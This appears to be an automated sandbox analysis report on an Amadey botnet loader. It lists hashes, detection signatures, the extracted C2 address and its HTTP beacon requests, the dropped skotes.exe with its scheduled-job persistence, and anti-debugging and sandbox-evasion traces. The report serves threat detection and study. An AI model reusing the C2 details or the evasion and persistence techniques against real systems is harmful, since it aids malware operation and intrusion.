Windows Analysis Report
msqT9atzYW.exe

Overview

General Information

Sample name: msqT9atzYW.exe
renamed because original name is a hash value
Original sample name: b2f874f58722f67061a01726f43ce570.exe
Analysis ID: 1540828
MD5: b2f874f58722f67061a01726f43ce570
SHA1: 87572c77ec7d2ae7385f5855b337d2ddb530cb01
SHA256: 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df
Tags: Amadey, exe, user-abuse_ch

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

Source: msqT9atzYW.exe Avira: detected
Source: http://185.215.113.43/Zu7JuNko/index.php URL Reputation: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000003.00000003.2271001764.0000000005790000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: http://185.215.113.43/Zu7JuNko/index.phpj Virustotal: Detection: 12%
Source: http://185.215.113.43/Zu7JuNko/index.phpF Virustotal: Detection: 12%
Source: http://185.215.113.43/Zu7JuNko/index.phpqYo30zpOYVp Virustotal: Detection: 12%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 57%
Source: msqT9atzYW.exe ReversingLabs: Detection: 57%
Source: msqT9atzYW.exe Virustotal: Detection: 52%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: msqT9atzYW.exe Joe Sandbox ML: detected
Source: msqT9atzYW.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49999 -> 185.215.113.43:80
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F6BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 7_2_00F6BE30
Source: unknown HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php-
Source: skotes.exe, 00000007.00000002.3479317358.000000000163F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7n
Source: skotes.exe, 00000007.00000002.3479317358.0000000001658000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpF
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpN
Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpW
Source: skotes.exe, 00000007.00000002.3479317358.0000000001658000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpj
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded_9
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpqYo30zpOYVp
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpt9
Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNm

System Summary

Source: msqT9atzYW.exe Static PE information: section name:
Source: msqT9atzYW.exe Static PE information: section name: .idata
Source: msqT9atzYW.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: C:\Users\user\Desktop\msqT9atzYW.exe File created: C:\Windows\Tasks\skotes.job
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe 4FEAE1EA40A074D042BA08876D3C459DDDCEFC9D4EAAD6A5A0709DD482E899DF
Source: msqT9atzYW.exe Static PE information: Section: ZLIB complexity 0.998414083787466
Source: msqT9atzYW.exe Static PE information: Section: xwcxlzln ZLIB complexity 0.9951746323529411
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.998414083787466
Source: skotes.exe.0.dr Static PE information: Section: xwcxlzln ZLIB complexity 0.9951746323529411
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\msqT9atzYW.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Users\user\Desktop\msqT9atzYW.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\msqT9atzYW.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: msqT9atzYW.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\msqT9atzYW.exe File read: C:\Users\user\Desktop\msqT9atzYW.exe
Source: unknown Process created: C:\Users\user\Desktop\msqT9atzYW.exe "C:\Users\user\Desktop\msqT9atzYW.exe"
Source: C:\Users\user\Desktop\msqT9atzYW.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: msqT9atzYW.exe Static file information: File size 1996800 > 1048576
Source: msqT9atzYW.exe Static PE information: Raw size of xwcxlzln is bigger than: 0x100000 < 0x1b5c00

Data Obfuscation

Source: C:\Users\user\Desktop\msqT9atzYW.exe Unpacked PE file: 0.2.msqT9atzYW.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 7.2.skotes.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1efeb5 should be: 0x1ebd33
Source: msqT9atzYW.exe Static PE information: real checksum: 0x1efeb5 should be: 0x1ebd33
Source: msqT9atzYW.exe Static PE information: section name:
Source: msqT9atzYW.exe Static PE information: section name: .idata
Source: msqT9atzYW.exe Static PE information: section name:
Source: msqT9atzYW.exe Static PE information: section name: xwcxlzln
Source: msqT9atzYW.exe Static PE information: section name: gxotezyq
Source: msqT9atzYW.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: xwcxlzln
Source: skotes.exe.0.dr Static PE information: section name: gxotezyq
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F7D91C push ecx; ret 7_2_00F7D92F
Source: msqT9atzYW.exe Static PE information: section name: entropy: 7.987683787433311
Source: msqT9atzYW.exe Static PE information: section name: xwcxlzln entropy: 7.954322884658926
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.987683787433311
Source: skotes.exe.0.dr Static PE information: section name: xwcxlzln entropy: 7.954322884658926
Source: C:\Users\user\Desktop\msqT9atzYW.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Boot Survival

Source: C:\Users\user\Desktop\msqT9atzYW.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\msqT9atzYW.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\msqT9atzYW.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\msqT9atzYW.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\Desktop\msqT9atzYW.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\msqT9atzYW.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\msqT9atzYW.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0B3F4 second address: E0B3FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0F445 second address: E0F450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0F450 second address: E0F457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0FB5D second address: E0FB61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0FB61 second address: E0FB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0FB67 second address: E0FB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F43C8AE008Ah 0x0000000d jnc 00007F43C8AE0078h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E0FD04 second address: E0FD09 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E12250 second address: E12254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1240B second address: E12416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F43C9098CE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E12416 second address: E1241B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1241B second address: E12421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E12957 second address: E1295C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1295C second address: E12966 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43C9098CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E12DAD second address: E12DCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F43C8AE0076h 0x00000009 jmp 00007F43C8AE007Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ebx 0x00000013 pushad 0x00000014 jnc 00007F43C8AE0076h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E12F11 second address: E12F37 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, 0A14A744h 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43C9098CF6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E12F37 second address: E12F4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F43C8AE0076h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 jg 00007F43C8AE007Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E143FB second address: E14400 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E167BA second address: E167CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E16E0F second address: E16E22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1A413 second address: E1A46D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C8AE0076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F43C8AE0078h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D18D8h] 0x0000002c push 00000000h 0x0000002e or dword ptr [ebp+122D2DBCh], esi 0x00000034 push 00000000h 0x00000036 mov edi, 1F4D0A95h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F43C8AE0084h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1A46D second address: E1A472 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DC43D1 second address: DC4428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ecx 0x0000000a js 00007F43C8AE0084h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F43C8AE007Ch 0x00000017 push edx 0x00000018 jc 00007F43C8AE0076h 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 popad 0x00000022 pushad 0x00000023 jmp 00007F43C8AE0082h 0x00000028 jmp 00007F43C8AE0088h 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1DA99 second address: E1DAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1DAA7 second address: E1DAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
